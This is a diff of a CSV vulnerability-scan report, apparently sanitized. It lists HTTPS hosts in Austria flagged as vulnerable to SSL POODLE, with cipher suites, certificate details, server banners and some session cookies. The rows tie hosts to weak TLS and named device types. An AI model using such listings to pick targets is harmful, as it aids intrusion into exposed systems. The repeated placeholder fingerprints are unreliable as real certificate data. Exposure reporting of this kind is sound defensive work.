-2018-04-19 13:32:41,198.51.100.187,443,198-51-100-187.example.net,ssl-poodle,TLSv1.2,28760,AT,OBEROSTERREICH,,TLS_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-187.example.net,Go Daddy Secure Certificate Authority - G2,2018-02-12 17:56:01,2020-02-12 17:56:01,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,03BA30FF4972177C,2,sha256WithRSAEncryption,rsaEncryption,,some_org_name,,,,,,,,198-51-100-187.example.net,,,,,US,Arizona,Scottsdale,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,400,No parameters passed t,text/html,,,,Microsoft-IIS/10.0,11,,"Thu, 19 Apr 2018 13:32:42 GMT",Y,N,N,Y,DV,
-2018-04-19 13:32:42,198.51.100.213,443,198-51-100-213.example.net,ssl-poodle,TLSv1.2,8447,AT,OBEROSTERREICH,,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-213.example.net,some_issuer,2016-09-22 08:12:17,2018-09-22 08:12:17,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,770000000EBB9429663601BAB700000000000E,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,AT,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,301,Moved Permanently,,close,,,Microsoft-IIS/8.5,0,,"Thu, 19 Apr 2018 13:32:44 GMT",N,N,N,N,unknown,x509: certificate signed by unknown authority
-2018-04-19 13:32:42,198.51.100.74,443,198-51-100-74.example.net,ssl-poodle,TLSv1.0,62363,AT,STEIERMARK,,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,DC,DC,2016-12-30 17:15:38,2021-12-30 17:15:38,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,7753CCEB55990A834E15DAC5707D403A,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/7.5,689,,"Thu, 19 Apr 2018 13:32:44 GMT",N,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:43,198.51.100.145,443,198-51-100-145.example.net,ssl-poodle,TLSv1.0,8447,AT,KARNTEN,KLAGENFURT AM WORTHERSEE,TLS_RSA_WITH_RC4_128_SHA,Y,1024,localdomain,localdomain,2008-10-07 20:12:54,2018-10-07 20:12:54,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,91B04FFCF174CCFF,0,sha1WithRSAEncryption,rsaEncryption,some_org_name,,CA,,,,,,,198-51-100-145.example.net,,,some_org_name,,CA,Quebec,Gatineau,,,,,198-51-100-145.example.net,,,518210,737415,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.0,302,Found,text/html; charset=UTF-8,close,,"HOMEBASEID=658512b32961b9b6f8df7a3d4de7fa01; expires=Tue, 19-Jan-",Apache/2.2.3 (Red Hat),0,,"Thu, 19 Apr 2018 12:52:32 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:44,198.51.100.48,443,198-51-100-48.example.net,ssl-poodle,TLSv1.0,1901,AT,NIEDEROSTERREICH,,TLS_RSA_WITH_RC4_128_SHA,Y,1024,198-51-100-48.example.net,198-51-100-48.example.net,2013-06-15 20:10:49,2023-06-15 20:10:49,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,013F49762DAE,0,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,US,,,,,,,198-51-100-48.example.net,,,Western Digital,Branded Products,US,CS,Mountain View,,,,,,,,518210,737415,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Apache,225,,"Thu, 19 Apr 2018 03:08:06 GMT",N,N,N,N,unknown,x509: certificate signed by unknown authority
-2018-04-19 13:32:45,198.51.100.94,443,198-51-100-94.example.net,ssl-poodle,TLSv1.2,6830,AT,WIEN,VIENNA,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-94.example.net,RapidSSL CA,2013-04-03 17:02:33,2014-04-07 03:32:33,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0B697D,2,sha1WithRSAEncryption,rsaEncryption,,some_org_name,,,,,,,,,,KtAjvog6HgAsml0cyxE4hpc9kv8dhgWZ,"GeoTrust, Inc.",,US,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Found,text/html; charset=utf-8,,,ASP.NET_SessionId=z5lph4ufefkvg1xzmd4q2m33; path=/; HttpOnly,Microsoft-IIS/8.0,144,,"Thu, 19 Apr 2018 13:32:48 GMT",Y,N,Y,N,unknown,x509: certificate has expired or is not yet valid
-2018-04-19 13:32:45,198.51.100.53,443,198-51-100-53.example.net,ssl-poodle,TLSv1.0,8447,AT,TIROL,,TLS_RSA_WITH_RC4_128_SHA,Y,1024,example,some_issuer,2008-11-13 13:47:18,2028-11-08 13:47:18,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,BE2B43544C0AFF2E,0,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,DE,,,,,,,198-51-100-53.example.net,,,some_org_name,some_org_name,DE,Niedersachsen,38162 Cremlingen (OT Schandelah),,,,,198-51-100-53.example.net,,,518210,737415,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html; charset=iso-8859-1;,,,,GoAhead-Webs,,,,Y,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:46,198.51.100.56,443,198-51-100-56.example.net,ssl-poodle,TLSv1.0,8445,AT,TIROL,,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-56.example.net,some_issuer,2016-11-28 08:05:12,2018-11-28 08:05:12,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,637D34F100010000000E,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/7.5,689,,"Thu, 19 Apr 2018 13:32:49 GMT",N,N,N,N,unknown,x509: certificate signed by unknown authority
-2018-04-19 13:32:46,198.51.100.82,443,198-51-100-82.example.net,ssl-poodle,TLSv1.0,6830,AT,OBEROSTERREICH,,TLS_RSA_WITH_AES_128_CBC_SHA,Y,1024,123AFG,7426AC8186F3,2011-01-01 00:00:06,2020-12-29 00:00:06,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,8186F3,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,US,,,,,,,,,,"Cisco Systems, Inc.",some_org_name,US,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.0,200,OK,text/html,close,,,Embedded HTTP Server.,107,,"Sat, 01 Jan 2011 00:00:45 GMT",N,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:48,198.51.100.29,443,198-51-100-29.example.net,ssl-poodle,TLSv1.0,6830,AT,STEIERMARK,GRAZ,TLS_RSA_WITH_RC4_128_SHA,Y,1024,198.51.100.43,198.51.100.22,2018-04-18 13:32:09,2038-01-15 13:32:09,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,862D98F4B99D0042,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,518210,737415,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.0,200,OK,text/html; charset=utf-8,,,,,,,,Y,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:49,198.51.100.114,443,198-51-100-114.example.net,ssl-poodle,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_AES_256_CBC_SHA,Y,1024,198-51-100-114.example.net,198-51-100-114.example.net,2009-08-25 17:47:57,2019-05-25 17:47:57,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,FB09C7848A7F4D77,0,sha1WithRSAEncryption,rsaEncryption,some_org_name,,AT,Vienna,Vienna,,,,,198-51-100-114.example.net,,,Digispectrum,,AT,Vienna,Vienna,,,,,198-51-100-114.example.net,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html; charset=utf-8,close,,b69223925949d45306d32f1a3d23c011=6a01vehilfpml41pl3pq3oth52; path,Apache/2.2.3 (CentOS),,chunked,"Thu, 19 Apr 2018 13:32:52 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:49,198.51.100.11,443,198-51-100-11.example.net,ssl-poodle,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,Y,2048,FGT60C3G12019794,FGT60C3G12019794,2012-08-10 07:17:11,2022-08-11 07:17:11,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,-6CD83A89,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,,,,,,,,,,,,Fortinet Ltd.,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,79,,"Thu, 19 Apr 2018 13:32:08 GMT",N,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:49,198.51.100.49,443,198-51-100-49.example.net,ssl-poodle,TLSv1.2,8447,AT,NIEDEROSTERREICH,,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,Y,1024,localhost,localhost,2009-11-10 23:48:47,2019-11-08 23:48:47,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,B5C752C98781B503,0,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,518210,737415,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.5.15,2190,,"Thu, 19 Apr 2018 13:32:55 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:50,198.51.100.236,443,,ssl-poodle,TLSv1.0,8447,AT,NIEDEROSTERREICH,,TLS_RSA_WITH_AES_128_CBC_SHA,Y,1024,example,some_issuer,2013-01-30 12:00:08,2023-01-28 12:00:08,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,-462A1420,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,US,,,,,,,,,,Netgear Inc.,Netgear Prosafe,US,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.0,200,OK,text/html,close,,,Embedded HTTP Server.,107,,"Sat, 01 Jan 2011 00:00:21 GMT",N,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:50,198.51.100.224,443,198-51-100-224.example.net,ssl-poodle,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-224.example.net,some_issuer,2017-08-03 10:21:50,2019-08-03 10:21:50,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,6126D181000300000041,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,401,Unauthorized,text/html,,NTLM,,Microsoft-IIS/7.5,1344,,"Thu, 19 Apr 2018 13:32:52 GMT",N,N,N,N,unknown,x509: certificate signed by unknown authority
+"timestamp","ip","port","hostname","tag","handshake","asn","geo","region","city","cipher_suite","ssl_poodle","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serial_number","naics","sic","sector","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","http_response_type","http_code","http_reason","content_type","http_connection","www_authenticate","set_cookie","server_type","content_length","transfer_encoding","http_date","cert_valid","self_signed","cert_expired","browser_trusted","validation_level","browser_error","tlsv13_support","tlsv13_cipher","device_model","device_sector","device_type","device_vendor","device_version","jarm","page_sha256fp","raw_cert","raw_cert_chain"
+"2018-08-08 00:51:42","203.0.113.85",8443,"example.com","ssl-poodle","TLSv1.0",65540,"AT","WIEN","VIENNA","TLS_RSA_WITH_RC4_128_SHA","Y",1024,"usg20_107BEF394BA5","usg20_107BEF394BA5","2014-06-25 00:00:42","2034-06-20 00:00:42","04:FA:DE:1D:BD:4A:05:25:61:FB:F3:D6:64:74:66:44:01:22:D7:C3","53AA112A",2,"sha1WithRSAEncryption","rsaEncryption",,,,,,,,,,,,,,,,,,,,,,,,,0,0,,"16:25:9F:C7:A1:8D:64:1F:D9:25:42:BF:87:5C:4F:F3:63:14:97:21:EC:B6:67:10:F2:CA:52:37:C9:FE:49:2E","0B:2D:48:8C:4B:55:8B:F3:AB:F8:45:ED:E0:A0:63:F4:84:2F:4C:19:DC:A8:6F:7D:6A:AF:61:D7:98:AA:58:0F:CB:CA:87:D2:C3:0B:C5:DF:49:A7:84:7C:47:58:89:7D:92:B6:7B:98:7D:B1:64:4B:DC:DD:BE:9D:11:2A:D1:AE","33:E3:61:3F:5D:AA:96:99:38:A5:D6:F1:11:C7:ED:FC","HTTP/1.1",200,"OK","text/html",,,,,,"chunked","Wed, 08 Aug 2018 00:51:44 GMT","Y","Y","N","N","unknown","x509: unknown error",,,,,,,,,,,
+2018-04-19 13:32:27,198.51.100.147,443,,ssl-poodle,TLSv1.0,8445,AT,SALZBURG,SALZBURG,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-147.example.net,some_issuer,2017-09-18 08:22:17,2019-09-18 08:22:17,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,746481F100000000000C,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,AT,Tirol,Ehrwald,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/7.5,689,,"Thu, 19 Apr 2018 13:32:32 GMT",N,N,N,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-19 13:32:32,198.51.100.207,443,198-51-100-94.example.net,ssl-poodle,TLSv1.0,25255,AT,SALZBURG,SALZBURG,TLS_RSA_WITH_RC4_128_SHA,Y,1024,example,some_issuer,2004-06-03 11:11:43,2024-05-29 11:11:43,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0,2,md5WithRSAEncryption,rsaEncryption,,,US,,,,,,,,,,,,US,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,close,,"rg_cookie_session_id=1654544029; path=/; expires=Fri, 01 Jan 2038",,,,"Thu, 19 Apr 2018 13:32:34 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:32,198.51.100.200,443,198-51-100-200.example.net,ssl-poodle,TLSv1.2,8445,AT,SALZBURG,,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-200.example.net,198-51-100-200.example.net,2016-10-01 14:09:12,2020-10-02 14:09:12,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,2E8C9E4A2C7D3EDC,2,sha256WithRSAEncryption,rsaEncryption,some_org_name,,AT,,,,,,,,,,some_org_name,,AT,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html; charset=utf-8,close,,,,,,,N,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:33,198.51.100.239,443,198-51-100-239.example.net,ssl-poodle,TLSv1.0,8437,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,Y,1024,198-51-100-239.example.net,198-51-100-239.example.net,2011-07-27 13:30:18,2012-07-26 13:30:18,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,7C91,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,--,SomeState,SomeCity,,,,,198-51-100-239.example.net,,,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-239.example.net,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,403,Forbidden,text/html; charset=UTF-8,close,,,Apache/2.2.3 (CentOS),4958,,"Thu, 19 Apr 2018 13:32:35 GMT",Y,Y,Y,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:35,198.51.100.156,443,,ssl-poodle,TLSv1.0,8447,AT,NIEDEROSTERREICH,,TLS_RSA_WITH_RC4_128_SHA,Y,1024,example,some_issuer,2010-01-01 00:00:52,2029-12-27 00:00:52,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4B3D3B34,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Thu, 19 Apr 2018 13:32:37 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:36,198.51.100.122,443,198-51-100-122.example.net,ssl-poodle,TLSv1.2,36351,AT,AUSTRIA,?,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,Y,2048,198-51-100-122.example.net,COMODO RSA Organization Validation Secure Server CA,2017-04-06 00:00:00,2019-04-06 23:59:59,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,CAB81F32F3FF4766BC545A2C14DF34B5,2,sha256WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,AT,Wien,Wien,,1130,,,,,,COMODO CA Limited,,GB,Greater Manchester,Salford,,,,,,,,518210,737401,Information 